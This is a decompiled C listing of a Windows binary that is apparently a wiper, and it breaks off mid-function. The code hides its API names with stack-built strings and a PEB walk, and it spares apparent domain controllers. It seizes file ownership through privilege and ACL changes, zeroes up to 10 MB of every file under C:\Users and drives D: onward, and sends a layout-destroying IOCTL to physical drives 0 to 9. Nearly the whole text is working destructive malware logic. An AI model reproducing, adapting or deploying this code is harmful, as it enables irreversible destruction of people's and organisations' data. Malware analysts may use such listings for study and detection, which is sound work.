/* This file was generated by the Hex-Rays decompiler version 8.3.0.230608.
   Copyright (c) 2007-2021 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

int start();
int sub_4011D0();
int __cdecl sub_4014B0(int *a1, int a2);
int __cdecl sub_401510(int a1);
int __cdecl sub_401530(const unsigned __int16 *a1, const char *a2);
BOOL __cdecl sub_401750(int a1, int a2, int a3);
int __cdecl sub_401A10(int a1);
int __cdecl sub_4022A0(_BYTE *a1);
_BYTE *__cdecl sub_402A80(int a1, _BYTE *a2, _BYTE *a3);
int __cdecl sub_402B10(int a1, int a2);

//-------------------------------------------------------------------------
// Data declarations

// extern DWORD (__stdcall *DsRoleGetPrimaryDomainInformation)(LPCWSTR lpServer, DSROLE_PRIMARY_DOMAIN_INFO_LEVEL InfoLevel, PBYTE *Buffer);


//----- (00401000) --------------------------------------------------------
int start()
{
  int result; // eax
  unsigned int i; // [esp+0h] [ebp-68h]
  char v2[16]; // [esp+4h] [ebp-64h] BYREF
  char v3[12]; // [esp+14h] [ebp-54h] BYREF
  char v4[16]; // [esp+20h] [ebp-48h] BYREF
  PBYTE Buffer; // [esp+30h] [ebp-38h] BYREF
  void (__stdcall *v6)(char *); // [esp+34h] [ebp-34h]
  char v7[16]; // [esp+38h] [ebp-30h] BYREF
  char v8[4]; // [esp+48h] [ebp-20h] BYREF
  unsigned __int16 v9; // [esp+4Ch] [ebp-1Ch] BYREF
  char v10; // [esp+4Eh] [ebp-1Ah]
  char v11; // [esp+4Fh] [ebp-19h]
  char v12; // [esp+50h] [ebp-18h]
  char v13; // [esp+51h] [ebp-17h]
  char v14; // [esp+52h] [ebp-16h]
  char v15; // [esp+53h] [ebp-15h]
  char v16; // [esp+54h] [ebp-14h]
  char v17; // [esp+55h] [ebp-13h]
  char v18; // [esp+56h] [ebp-12h]
  char v19; // [esp+57h] [ebp-11h]
  char v20; // [esp+58h] [ebp-10h]
  char v21; // [esp+59h] [ebp-Fh]
  char v22; // [esp+5Ah] [ebp-Eh]
  char v23; // [esp+5Bh] [ebp-Dh]
  char v24; // [esp+5Ch] [ebp-Ch]
  char v25; // [esp+5Dh] [ebp-Bh]
  char v26; // [esp+5Eh] [ebp-Ah]
  char v27; // [esp+5Fh] [ebp-9h]
  char v28; // [esp+60h] [ebp-8h]
  char v29; // [esp+61h] [ebp-7h]
  char v30; // [esp+62h] [ebp-6h]
  char v31; // [esp+63h] [ebp-5h]
  char v32; // [esp+64h] [ebp-4h]
  char v33; // [esp+65h] [ebp-3h]

  v9 = 107;
  v10 = 101;
  v11 = 0;
  v12 = 114;
  v13 = 0;
  v14 = 110;
  v15 = 0;
  v16 = 101;
  v17 = 0;
  v18 = 108;
  v19 = 0;
  v20 = 51;
  v21 = 0;
  v22 = 50;
  v23 = 0;
  v24 = 46;
  v25 = 0;
  v26 = 100;
  v27 = 0;
  v28 = 108;
  v29 = 0;
  v30 = 108;
  v31 = 0;
  v32 = 0;
  v33 = 0;
  strcpy(v4, "advapi32.dll");
  strcpy(v7, "LoadLibraryA");
  v6 = (void (__stdcall *)(char *))sub_401530(&v9, v7);
  strcpy(v2, "netapi32.dll");
  v6(v2);
  Buffer = 0;
  result = DsRoleGetPrimaryDomainInformation(0, DsRolePrimaryDomainInfoBasic, &Buffer);
  if ( *(_DWORD *)Buffer != 5 )
  {
    v6(v4);
    strcpy(v3, "C:\\Users");
    sub_4022A0(v3);
    strcpy(v8, "D:\\");
    for ( i = 0; i < 0x18; ++i )
    {
      sub_4022A0(v8);
      ++v8[0];
    }
    return sub_4011D0();
  }
  return result;
}

//----- (004011D0) --------------------------------------------------------
int sub_4011D0()
{
  int result; // eax
  int v1; // [esp+4h] [ebp-808h] BYREF
  int (__stdcall *v2)(char *, int, int, _DWORD, int, int, _DWORD); // [esp+8h] [ebp-804h]
  char v3[12]; // [esp+Ch] [ebp-800h] BYREF
  int v4; // [esp+18h] [ebp-7F4h]
  char v5[1924]; // [esp+1Ch] [ebp-7F0h] BYREF
  void (__stdcall *v6)(int, int, char *, int, _DWORD, _DWORD, int *, _DWORD); // [esp+7A0h] [ebp-6Ch]
  char v7[4]; // [esp+7A4h] [ebp-68h] BYREF
  char v8[4]; // [esp+7A8h] [ebp-64h] BYREF
  char v9[4]; // [esp+7ACh] [ebp-60h] BYREF
  char v10[4]; // [esp+7B0h] [ebp-5Ch] BYREF
  char v11[4]; // [esp+7B4h] [ebp-58h] BYREF
  char v12[4]; // [esp+7B8h] [ebp-54h] BYREF
  char v13[4]; // [esp+7BCh] [ebp-50h] BYREF
  char v14[4]; // [esp+7C0h] [ebp-4Ch] BYREF
  char v15[8]; // [esp+7C4h] [ebp-48h] BYREF
  char v16[16]; // [esp+7CCh] [ebp-40h] BYREF
  char v17[12]; // [esp+7DCh] [ebp-30h] BYREF
  unsigned __int16 v18; // [esp+7E8h] [ebp-24h] BYREF
  char v19; // [esp+7EAh] [ebp-22h]
  char v20; // [esp+7EBh] [ebp-21h]
  char v21; // [esp+7ECh] [ebp-20h]
  char v22; // [esp+7EDh] [ebp-1Fh]
  char v23; // [esp+7EEh] [ebp-1Eh]
  char v24; // [esp+7EFh] [ebp-1Dh]
  char v25; // [esp+7F0h] [ebp-1Ch]
  char v26; // [esp+7F1h] [ebp-1Bh]
  char v27; // [esp+7F2h] [ebp-1Ah]
  char v28; // [esp+7F3h] [ebp-19h]
  char v29; // [esp+7F4h] [ebp-18h]
  char v30; // [esp+7F5h] [ebp-17h]
  char v31; // [esp+7F6h] [ebp-16h]
  char v32; // [esp+7F7h] [ebp-15h]
  char v33; // [esp+7F8h] [ebp-14h]
  char v34; // [esp+7F9h] [ebp-13h]
  char v35; // [esp+7FAh] [ebp-12h]
  char v36; // [esp+7FBh] [ebp-11h]
  char v37; // [esp+7FCh] [ebp-10h]
  char v38; // [esp+7FDh] [ebp-Fh]
  char v39; // [esp+7FEh] [ebp-Eh]
  char v40; // [esp+7FFh] [ebp-Dh]
  char v41; // [esp+800h] [ebp-Ch]
  char v42; // [esp+801h] [ebp-Bh]
  void (__stdcall *v43)(int); // [esp+804h] [ebp-8h]
  int v44; // [esp+808h] [ebp-4h]

  strcpy(v16, "DeviceIoControl");
  v18 = 107;
  v19 = 101;
  v20 = 0;
  v21 = 114;
  v22 = 0;
  v23 = 110;
  v24 = 0;
  v25 = 101;
  v26 = 0;
  v27 = 108;
  v28 = 0;
  v29 = 51;
  v30 = 0;
  v31 = 50;
  v32 = 0;
  v33 = 46;
  v34 = 0;
  v35 = 100;
  v36 = 0;
  v37 = 108;
  v38 = 0;
  v39 = 108;
  v40 = 0;
  v41 = 0;
  v42 = 0;
  strcpy(v17, "CreateFileW");
  v2 = (int (__stdcall *)(char *, int, int, _DWORD, int, int, _DWORD))sub_401530(&v18, v17);
  v6 = (void (__stdcall *)(int, int, char *, int, _DWORD, _DWORD, int *, _DWORD))sub_401530(&v18, v16);
  v43 = 0;
  strcpy(v3, "CloseHandle");
  v43 = (void (__stdcall *)(int))sub_401530(&v18, v3);
  v4 = 9;
  v1 = 0;
  v44 = -1;
  sub_402B10((int)v5, 1920);
  strcpy(v7, "\\");
  strcpy(&v7[2], "\\");
  strcpy(v8, ".");
  strcpy(&v8[2], "\\");
  strcpy(v9, "P");
  strcpy(&v9[2], "H");
  strcpy(v10, "Y");
  strcpy(&v10[2], "S");
  strcpy(v11, "I");
  strcpy(&v11[2], "C");
  strcpy(v12, "A");
  strcpy(&v12[2], "L");
  strcpy(v13, "D");
  strcpy(&v13[2], "R");
  strcpy(v14, "I");
  strcpy(&v14[2], "V");
  strcpy(v15, "E");
  strcpy(&v15[2], "9");
  v15[4] = 0;
  v15[5] = 0;
  do
  {
    v44 = v2(v7, -1073741824, 3, 0, 3, 128, 0);
    if ( v44 != -1 )
    {
      v6(v44, 507988, v5, 1920, 0, 0, &v1, 0);
      v43(v44);
    }
    --v15[2];
    result = v4--;
  }
  while ( result );
  return result;
}

//----- (004014B0) --------------------------------------------------------
int __cdecl sub_4014B0(int *a1, int a2)
{
  int result; // eax
  int *i; // [esp+8h] [ebp-4h]

  result = (int)a1;
  for ( i = a1; i < (int *)((char *)a1 + a2); i = (int *)((char *)i + 1) )
  {
    result = *(char *)i;
    if ( result >= 65 && *(char *)i <= 90 )
    {
      result = *i + 32;
      *i = result;
    }
  }
  return result;
}

//----- (00401510) --------------------------------------------------------
int __cdecl sub_401510(int a1)
{
  return *(_DWORD *)(a1 + *(_DWORD *)(a1 + 60) + 120);
}

//----- (00401530) --------------------------------------------------------
int __cdecl sub_401530(const unsigned __int16 *a1, const char *a2)
{
  int v3; // [esp+40h] [ebp-30h]
  int v4; // [esp+58h] [ebp-18h]
  int v5; // [esp+60h] [ebp-10h]
  struct _LIST_ENTRY *Flink; // [esp+64h] [ebp-Ch]
  int v7; // [esp+68h] [ebp-8h]
  int *v8; // [esp+6Ch] [ebp-4h]

  v7 = 0;
  Flink = NtCurrentPeb()->Ldr->InMemoryOrderModuleList.Flink;
  do
  {
    v8 = (int *)Flink[5].Flink;
    sub_4014B0(v8, 2 * wcslen((const unsigned __int16 *)v8));
    if ( !wcscmp((const unsigned __int16 *)v8, a1) )
    {
      v5 = (int)Flink[2].Flink;
      v4 = sub_401510(v5);
      if ( v4 )
      {
        v3 = *(_DWORD *)(v4 + v5 + 24);
        while ( 1 )
        {
          --v3;
          if ( !strcmp((const char *)(v5 + *(_DWORD *)(v5 + *(_DWORD *)(v4 + v5 + 32) + 4 * v3)), a2) )
            break;
          if ( !v3 )
            goto LABEL_8;
        }
        v7 = *(_DWORD *)(v5
                       + *(_DWORD *)(v4 + v5 + 28)
                       + 4 * *(unsigned __int16 *)(v5 + *(_DWORD *)(v4 + v5 + 36) + 2 * v3))
           + v5;
      }
    }
LABEL_8:
    Flink = Flink->Flink;
  }
  while ( Flink[2].Flink && !v7 );
  return v7;
}

//----- (00401750) --------------------------------------------------------
BOOL __cdecl sub_401750(int a1, int a2, int a3)
{
  int v4; // [esp+0h] [ebp-9Ch] BYREF
  int v5; // [esp+4h] [ebp-98h]
  int v6; // [esp+8h] [ebp-94h]
  int v7; // [esp+Ch] [ebp-90h]
  unsigned __int16 v8; // [esp+10h] [ebp-8Ch] BYREF
  char v9; // [esp+12h] [ebp-8Ah]
  char v10; // [esp+13h] [ebp-89h]
  char v11; // [esp+14h] [ebp-88h]
  char v12; // [esp+15h] [ebp-87h]
  char v13; // [esp+16h] [ebp-86h]
  char v14; // [esp+17h] [ebp-85h]
  char v15; // [esp+18h] [ebp-84h]
  char v16; // [esp+19h] [ebp-83h]
  char v17; // [esp+1Ah] [ebp-82h]
  char v18; // [esp+1Bh] [ebp-81h]
  char v19; // [esp+1Ch] [ebp-80h]
  char v20; // [esp+1Dh] [ebp-7Fh]
  char v21; // [esp+1Eh] [ebp-7Eh]
  char v22; // [esp+1Fh] [ebp-7Dh]
  char v23; // [esp+20h] [ebp-7Ch]
  char v24; // [esp+21h] [ebp-7Bh]
  char v25; // [esp+22h] [ebp-7Ah]
  char v26; // [esp+23h] [ebp-79h]
  char v27; // [esp+24h] [ebp-78h]
  char v28; // [esp+25h] [ebp-77h]
  char v29; // [esp+26h] [ebp-76h]
  char v30; // [esp+27h] [ebp-75h]
  char v31; // [esp+28h] [ebp-74h]
  char v32; // [esp+29h] [ebp-73h]
  char v33[24]; // [esp+2Ch] [ebp-70h] BYREF
  int v34[2]; // [esp+44h] [ebp-58h] BYREF
  int (__stdcall *v35)(int, _DWORD, int *, int, _DWORD, _DWORD); // [esp+4Ch] [ebp-50h]
  int (__cdecl *v36)(int, int, int, int); // [esp+50h] [ebp-4Ch]
  char v37[24]; // [esp+54h] [ebp-48h] BYREF
  int (__stdcall *v38)(_DWORD, int, int *); // [esp+6Ch] [ebp-30h]
  char v39[16]; // [esp+70h] [ebp-2Ch] BYREF
  unsigned __int16 v40; // [esp+80h] [ebp-1Ch] BYREF
  char v41; // [esp+82h] [ebp-1Ah]
  char v42; // [esp+83h] [ebp-19h]
  char v43; // [esp+84h] [ebp-18h]
  char v44; // [esp+85h] [ebp-17h]
  char v45; // [esp+86h] [ebp-16h]
  char v46; // [esp+87h] [ebp-15h]
  char v47; // [esp+88h] [ebp-14h]
  char v48; // [esp+89h] [ebp-13h]
  char v49; // [esp+8Ah] [ebp-12h]
  char v50; // [esp+8Bh] [ebp-11h]
  char v51; // [esp+8Ch] [ebp-10h]
  char v52; // [esp+8Dh] [ebp-Fh]
  char v53; // [esp+8Eh] [ebp-Eh]
  char v54; // [esp+8Fh] [ebp-Dh]
  char v55; // [esp+90h] [ebp-Ch]
  char v56; // [esp+91h] [ebp-Bh]
  char v57; // [esp+92h] [ebp-Ah]
  char v58; // [esp+93h] [ebp-9h]
  char v59; // [esp+94h] [ebp-8h]
  char v60; // [esp+95h] [ebp-7h]
  char v61; // [esp+96h] [ebp-6h]
  char v62; // [esp+97h] [ebp-5h]
  char v63; // [esp+98h] [ebp-4h]
  char v64; // [esp+99h] [ebp-3h]

  v38 = 0;
  v8 = 97;
  v9 = 100;
  v10 = 0;
  v11 = 118;
  v12 = 0;
  v13 = 97;
  v14 = 0;
  v15 = 112;
  v16 = 0;
  v17 = 105;
  v18 = 0;
  v19 = 51;
  v20 = 0;
  v21 = 50;
  v22 = 0;
  v23 = 46;
  v24 = 0;
  v25 = 100;
  v26 = 0;
  v27 = 108;
  v28 = 0;
  v29 = 108;
  v30 = 0;
  v31 = 0;
  v32 = 0;
  strcpy(v33, "LookupPrivilegeValueA");
  v38 = (int (__stdcall *)(_DWORD, int, int *))sub_401530(&v8, v33);
  v35 = 0;
  strcpy(v37, "AdjustTokenPrivileges");
  v35 = (int (__stdcall *)(int, _DWORD, int *, int, _DWORD, _DWORD))sub_401530(&v8, v37);
  v36 = 0;
  strcpy(v39, "GetLastError");
  v40 = 107;
  v41 = 101;
  v42 = 0;
  v43 = 114;
  v44 = 0;
  v45 = 110;
  v46 = 0;
  v47 = 101;
  v48 = 0;
  v49 = 108;
  v50 = 0;
  v51 = 51;
  v52 = 0;
  v53 = 50;
  v54 = 0;
  v55 = 46;
  v56 = 0;
  v57 = 100;
  v58 = 0;
  v59 = 108;
  v60 = 0;
  v61 = 108;
  v62 = 0;
  v63 = 0;
  v64 = 0;
  v36 = (int (__cdecl *)(int, int, int, int))sub_401530(&v40, v39);
  if ( !v38(0, a2, v34) )
    return 0;
  v4 = 1;
  v5 = v34[0];
  v6 = v34[1];
  if ( a3 )
    v7 = 2;
  else
    v7 = 0;
  return v35(a1, 0, &v4, 16, 0, 0) && v36(v4, v5, v6, v7) != 1300;
}

//----- (00401A10) --------------------------------------------------------
int __cdecl sub_401A10(int a1)
{
  int v1; // eax
  int v3; // [esp+0h] [ebp-174h] BYREF
  unsigned __int16 v4; // [esp+4h] [ebp-170h] BYREF
  char v5; // [esp+6h] [ebp-16Eh]
  char v6; // [esp+7h] [ebp-16Dh]
  char v7; // [esp+8h] [ebp-16Ch]
  char v8; // [esp+9h] [ebp-16Bh]
  char v9; // [esp+Ah] [ebp-16Ah]
  char v10; // [esp+Bh] [ebp-169h]
  char v11; // [esp+Ch] [ebp-168h]
  char v12; // [esp+Dh] [ebp-167h]
  char v13; // [esp+Eh] [ebp-166h]
  char v14; // [esp+Fh] [ebp-165h]
  char v15; // [esp+10h] [ebp-164h]
  char v16; // [esp+11h] [ebp-163h]
  char v17; // [esp+12h] [ebp-162h]
  char v18; // [esp+13h] [ebp-161h]
  char v19; // [esp+14h] [ebp-160h]
  char v20; // [esp+15h] [ebp-15Fh]
  char v21; // [esp+16h] [ebp-15Eh]
  char v22; // [esp+17h] [ebp-15Dh]
  char v23; // [esp+18h] [ebp-15Ch]
  char v24; // [esp+19h] [ebp-15Bh]
  char v25; // [esp+1Ah] [ebp-15Ah]
  char v26; // [esp+1Bh] [ebp-159h]
  char v27; // [esp+1Ch] [ebp-158h]
  char v28; // [esp+1Dh] [ebp-157h]
  char v29[24]; // [esp+20h] [ebp-154h] BYREF
  char v30[20]; // [esp+38h] [ebp-13Ch] BYREF
  int v31[17]; // [esp+4Ch] [ebp-128h] BYREF
  char v32[28]; // [esp+90h] [ebp-E4h] BYREF
  char v33[12]; // [esp+ACh] [ebp-C8h] BYREF
  int (__stdcall *v34)(int, int *); // [esp+B8h] [ebp-BCh]
  int (__stdcall *v35)(int, int, int, int, _DWORD, int, _DWORD); // [esp+BCh] [ebp-B8h]
  void (__stdcall *v36)(int); // [esp+C0h] [ebp-B4h]
  int (__stdcall *v37)(int, int *, _DWORD, int *); // [esp+C4h] [ebp-B0h]
  char v38[20]; // [esp+C8h] [ebp-ACh] BYREF
  int (__stdcall *v39)(char *, int, int, int, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, int *); // [esp+DCh] [ebp-98h]
  int v40; // [esp+E0h] [ebp-94h] BYREF
  char v41[28]; // [esp+E4h] [ebp-90h] BYREF
  char v42[8]; // [esp+100h] [ebp-74h] BYREF
  int v43; // [esp+108h] [ebp-6Ch]
  int v44; // [esp+10Ch] [ebp-68h] BYREF
  int v45; // [esp+110h] [ebp-64h] BYREF
  char v46[12]; // [esp+114h] [ebp-60h] BYREF
  void (__stdcall *v47)(int); // [esp+120h] [ebp-54h]
  char v48[8]; // [esp+124h] [ebp-50h] BYREF
  unsigned __int16 v49; // [esp+12Ch] [ebp-48h] BYREF
  char v50; // [esp+12Eh] [ebp-46h]
  char v51; // [esp+12Fh] [ebp-45h]
  char v52; // [esp+130h] [ebp-44h]
  char v53; // [esp+131h] [ebp-43h]
  char v54; // [esp+132h] [ebp-42h]
  char v55; // [esp+133h] [ebp-41h]
  char v56; // [esp+134h] [ebp-40h]
  char v57; // [esp+135h] [ebp-3Fh]
  char v58; // [esp+136h] [ebp-3Eh]
  char v59; // [esp+137h] [ebp-3Dh]
  char v60; // [esp+138h] [ebp-3Ch]
  char v61; // [esp+139h] [ebp-3Bh]
  char v62; // [esp+13Ah] [ebp-3Ah]
  char v63; // [esp+13Bh] [ebp-39h]
  char v64; // [esp+13Ch] [ebp-38h]
  char v65; // [esp+13Dh] [ebp-37h]
  char v66; // [esp+13Eh] [ebp-36h]
  char v67; // [esp+13Fh] [ebp-35h]
  char v68; // [esp+140h] [ebp-34h]
  char v69; // [esp+141h] [ebp-33h]
  char v70; // [esp+142h] [ebp-32h]
  char v71; // [esp+143h] [ebp-31h]
  char v72; // [esp+144h] [ebp-30h]
  char v73; // [esp+145h] [ebp-2Fh]
  char v74[20]; // [esp+148h] [ebp-2Ch] BYREF
  char v75[8]; // [esp+15Ch] [ebp-18h] BYREF
  int v76; // [esp+164h] [ebp-10h]
  int v77; // [esp+168h] [ebp-Ch]
  int (__stdcall *v78)(int); // [esp+16Ch] [ebp-8h]
  void (__stdcall *v79)(int); // [esp+170h] [ebp-4h]

  v43 = 0;
  v44 = 0;
  v3 = 0;
  v40 = 0;
  v45 = 0;
  v75[0] = 0;
  v75[1] = 0;
  v75[2] = 0;
  v75[3] = 0;
  v75[4] = 0;
  v75[5] = 1;
  v48[0] = 0;
  v48[1] = 0;
  v48[2] = 0;
  v48[3] = 0;
  v48[4] = 0;
  v48[5] = 5;
  v76 = 2;
  v37 = 0;
  v4 = 97;
  v5 = 100;
  v6 = 0;
  v7 = 118;
  v8 = 0;
  v9 = 97;
  v10 = 0;
  v11 = 112;
  v12 = 0;
  v13 = 105;
  v14 = 0;
  v15 = 51;
  v16 = 0;
  v17 = 50;
  v18 = 0;
  v19 = 46;
  v20 = 0;
  v21 = 100;
  v22 = 0;
  v23 = 108;
  v24 = 0;
  v25 = 108;
  v26 = 0;
  v27 = 0;
  v28 = 0;
  strcpy(v38, "SetEntriesInAclA");
  v37 = (int (__stdcall *)(int, int *, _DWORD, int *))sub_401530(&v4, v38);
  v39 = 0;
  strcpy(v41, "AllocateAndInitializeSid");
  v39 = (int (__stdcall *)(char *, int, int, int, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, int *))sub_401530(&v4, v41);
  v35 = 0;
  strcpy(v29, "SetNamedSecurityInfoA");
  v35 = (int (__stdcall *)(int, int, int, int, _DWORD, int, _DWORD))sub_401530(&v4, v29);
  v34 = 0;
  v49 = 107;
  v50 = 101;
  v51 = 0;
  v52 = 114;
  v53 = 0;
  v54 = 110;
  v55 = 0;
  v56 = 101;
  v57 = 0;
  v58 = 108;
  v59 = 0;
  v60 = 51;
  v61 = 0;
  v62 = 50;
  v63 = 0;
  v64 = 46;
  v65 = 0;
  v66 = 100;
  v67 = 0;
  v68 = 108;
  v69 = 0;
  v70 = 108;
  v71 = 0;
  v72 = 0;
  v73 = 0;
  strcpy(v30, "GetCurrentProcess");
  v34 = (int (__stdcall *)(int, int *))sub_401530(&v49, v30);
  v78 = 0;
  strcpy(v74, "OpenProcessToken");
  v78 = (int (__stdcall *)(int))sub_401530(&v4, v74);
  if ( v39(v75, 1, 0, 0, 0, 0, 0, 0, 0, 0, &v40) )
  {
    if ( v39(v48, 2, 32, 544, 0, 0, 0, 0, 0, 0, &v3) )
    {
      sub_402B10((int)v31, 64);
      v31[0] = 0x80000000;
      v31[1] = 2;
      v31[2] = 0;
      v31[5] = 0;
      v31[6] = 5;
      v31[7] = v40;
      v31[8] = 0x10000000;
      v31[9] = 2;
      v31[10] = 0;
      v31[13] = 0;
      v31[14] = 2;
      v31[15] = v3;
      if ( !v37(2, v31, 0, &v45) )
      {
        v77 = v35(a1, 1, 4, 0, 0, v45, 0);
        if ( v77 )
        {
          if ( v77 == 5 )
          {
            v1 = v34(32, &v44);
            if ( v78(v1) )
            {
              strcpy(v32, "SeTakeOwnershipPrivilege");
              if ( sub_401750(v44, (int)v32, 1) )
              {
                v77 = v35(a1, 1, 1, v3, 0, 0, 0);
                if ( !v77 )
                {
                  if ( sub_401750(v44, (int)v32, 0) )
                  {
                    v77 = v35(a1, 1, 4, 0, 0, v45, 0);
                    if ( !v77 )
                      v43 = 1;
                  }
                }
              }
            }
          }
        }
        else
        {
          v43 = 1;
        }
      }
    }
  }
  v47 = 0;
  strcpy(v42, "FreeSid");
  v47 = (void (__stdcall *)(int))sub_401530(&v4, v42);
  v36 = 0;
  strcpy(v46, "LocalFree");
  v36 = (void (__stdcall *)(int))sub_401530(&v49, v46);
  v79 = 0;
  strcpy(v33, "CloseHandle");
  v79 = (void (__stdcall *)(int))sub_401530(&v49, v33);
  if ( v3 )
    v47(v3);
  if ( v40 )
    v47(v40);
  if ( v45 )
    v36(v45);
  if ( v44 )
    v79(v44);
  return v43;
}

//----- (004022A0) --------------------------------------------------------
int __cdecl sub_4022A0(_BYTE *a1)
{
  int result; // eax
  unsigned int v2; // [esp+0h] [ebp-E5Ch]
  int v3; // [esp+4h] [ebp-E58h] BYREF
  int v4; // [esp+8h] [ebp-E54h]
  int v5; // [esp+Ch] [ebp-E50h]
  int (__stdcall *v6)(int, _BYTE *); // [esp+10h] [ebp-E4Ch]
  int (__stdcall *v7)(int, unsigned int); // [esp+14h] [ebp-E48h]
  int (__stdcall *v8)(int); // [esp+18h] [ebp-E44h]
  char v9[4]; // [esp+1Ch] [ebp-E40h] BYREF
  char v10[12]; // [esp+20h] [ebp-E3Ch] BYREF
  void (__stdcall *v11)(int, _DWORD, _DWORD, _DWORD); // [esp+2Ch] [ebp-E30h]
  char v12[12]; // [esp+30h] [ebp-E2Ch] BYREF
  int v13; // [esp+3Ch] [ebp-E20h]
  char v14[4]; // [esp+40h] [ebp-E1Ch] BYREF
  char v15[12]; // [esp+44h] [ebp-E18h] BYREF
  void (__stdcall *v16)(int); // [esp+50h] [ebp-E0Ch]
  _BYTE v17[44]; // [esp+54h] [ebp-E08h] BYREF
  char v18; // [esp+80h] [ebp-DDCh] BYREF
  char v19; // [esp+81h] [ebp-DDBh]
  char v20[1044]; // [esp+194h] [ebp-CC8h] BYREF
  int (__stdcall *v21)(char *, _BYTE *); // [esp+5A8h] [ebp-8B4h]
  char v22[16]; // [esp+5ACh] [ebp-8B0h] BYREF
  int (__stdcall *v23)(char *, int, int, _DWORD, int, int, _DWORD); // [esp+5BCh] [ebp-8A0h]
  int (__stdcall *v24)(int, _DWORD); // [esp+5C0h] [ebp-89Ch]
  char v25[1040]; // [esp+5C4h] [ebp-898h] BYREF
  char v26[16]; // [esp+9D4h] [ebp-488h] BYREF
  char v27[12]; // [esp+9E4h] [ebp-478h] BYREF
  char v28[16]; // [esp+9F0h] [ebp-46Ch] BYREF
  char v29[12]; // [esp+A00h] [ebp-45Ch] BYREF
  void (__stdcall *v30)(int, int, unsigned int, int *, _DWORD); // [esp+A0Ch] [ebp-450h]
  unsigned __int16 v31; // [esp+A10h] [ebp-44Ch] BYREF
  char v32; // [esp+A12h] [ebp-44Ah]
  char v33; // [esp+A13h] [ebp-449h]
  char v34; // [esp+A14h] [ebp-448h]
  char v35; // [esp+A15h] [ebp-447h]
  char v36; // [esp+A16h] [ebp-446h]
  char v37; // [esp+A17h] [ebp-445h]
  char v38; // [esp+A18h] [ebp-444h]
  char v39; // [esp+A19h] [ebp-443h]
  char v40; // [esp+A1Ah] [ebp-442h]
  char v41; // [esp+A1Bh] [ebp-441h]
  char v42; // [esp+A1Ch] [ebp-440h]
  char v43; // [esp+A1Dh] [ebp-43Fh]
  char v44; // [esp+A1Eh] [ebp-43Eh]
  char v45; // [esp+A1Fh] [ebp-43Dh]
  char v46; // [esp+A20h] [ebp-43Ch]
  char v47; // [esp+A21h] [ebp-43Bh]
  char v48; // [esp+A22h] [ebp-43Ah]
  char v49; // [esp+A23h] [ebp-439h]
  char v50; // [esp+A24h] [ebp-438h]
  char v51; // [esp+A25h] [ebp-437h]
  char v52; // [esp+A26h] [ebp-436h]
  char v53; // [esp+A27h] [ebp-435h]
  char v54; // [esp+A28h] [ebp-434h]
  char v55; // [esp+A29h] [ebp-433h]
  char v56[1044]; // [esp+A2Ch] [ebp-430h] BYREF
  char v57[12]; // [esp+E40h] [ebp-1Ch] BYREF
  char v58[12]; // [esp+E4Ch] [ebp-10h] BYREF
  void (__stdcall *v59)(int); // [esp+E58h] [ebp-4h]

  v13 = -1;
  strcpy(v14, "*");
  strcpy(v9, "\\");
  sub_402A80((int)v20, a1, v9);
  sub_402A80((int)v25, v20, v14);
  v21 = 0;
  strcpy(v28, "FindFirstFileA");
  v31 = 107;
  v32 = 101;
  v33 = 0;
  v34 = 114;
  v35 = 0;
  v36 = 110;
  v37 = 0;
  v38 = 101;
  v39 = 0;
  v40 = 108;
  v41 = 0;
  v42 = 51;
  v43 = 0;
  v44 = 50;
  v45 = 0;
  v46 = 46;
  v47 = 0;
  v48 = 100;
  v49 = 0;
  v50 = 108;
  v51 = 0;
  v52 = 108;
  v53 = 0;
  v54 = 0;
  v55 = 0;
  v21 = (int (__stdcall *)(char *, _BYTE *))sub_401530(&v31, v28);
  strcpy(v22, "FindNextFileA");
  v6 = (int (__stdcall *)(int, _BYTE *))sub_401530(&v31, v22);
  v23 = 0;
  strcpy(v10, "CreateFileA");
  v23 = (int (__stdcall *)(char *, int, int, _DWORD, int, int, _DWORD))sub_401530(&v31, v10);
  v24 = 0;
  strcpy(v15, "GetFileSize");
  v24 = (int (__stdcall *)(int, _DWORD))sub_401530(&v31, v15);
  strcpy(v29, "LocalAlloc");
  v7 = (int (__stdcall *)(int, unsigned int))sub_401530(&v31, v29);
  v11 = 0;
  strcpy(v26, "SetFilePointer");
  v11 = (void (__stdcall *)(int, _DWORD, _DWORD, _DWORD))sub_401530(&v31, v26);
  v30 = 0;
  strcpy(v57, "WriteFile");
  v30 = (void (__stdcall *)(int, int, unsigned int, int *, _DWORD))sub_401530(&v31, v57);
  v16 = 0;
  strcpy(v27, "LocalFree");
  v16 = (void (__stdcall *)(int))sub_401530(&v31, v27);
  v59 = 0;
  strcpy(v12, "CloseHandle");
  v59 = (void (__stdcall *)(int))sub_401530(&v31, v12);
  strcpy(v58, "FindClose");
  v8 = (int (__stdcall *)(int))sub_401530(&v31, v58);
  result = v21(v25, v17);
  v13 = result;
  if ( result != -1 )
  {
    do
    {
      if ( (v17[0] & 0x10) != 0 )
      {
        if ( (v18 != 46 || v19 && v19 != 46) && (v17[0] & 2) == 0 && (v17[0] & 4) == 0 )
        {
          sub_402A80((int)v20, a1, v9);
          sub_402A80((int)v56, v20, &v18);
          sub_401A10((int)v56);
          sub_4022A0(v56);
        }
      }
      else
      {
        sub_402A80((int)v20, a1, v9);
        sub_402A80((int)v56, v20, &v18);
        if ( sub_401A10((int)v56) )
        {
          v4 = v23(v56, -1073741824, 3, 0, 3, 128, 0);
          if ( v4 != -1 )
          {
            v2 = v24(v4, 0);
            if ( v2 > 0xA00000 )
              v2 = 10485760;
            v3 = 0;
            v5 = v7(64, v2);
            sub_402B10(v5, v2);
            v11(v4, 0, 0, 0);
            v30(v4, v5, v2, &v3, 0);
            v16(v5);
            v59(v4);
          }
        }
      }
    }
    while ( v6(v13, v17) );
    return v8(v13);
  }
  return result;
}
// 4022A0: using guessed type _BYTE var_E08[44];

//----- (00402A80) --------------------------------------------------------
_BYTE *__cdecl sub_402A80(int a1, _BYTE *a2, _BYTE *a3)
{
  _BYTE *result; // eax
  int v4; // [esp+0h] [ebp-Ch]
  char i; // [esp+7h] [ebp-5h]
  _BYTE v6[5]; // [esp+7h] [ebp-5h]

  v4 = 0;
  result = a2;
  for ( i = *a2; i; i = a2[v4] )
  {
    *(_BYTE *)(v4 + a1) = i;
    result = &a2[++v4];
  }
  v6[4] = 0;
  LOBYTE(result) = *a3;
  *(_DWORD *)v6 = (unsigned __int8)*a3;
  while ( v6[0] )
  {
    *(_BYTE *)(v4 + a1) = v6[0];
    ++*(_DWORD *)&v6[1];
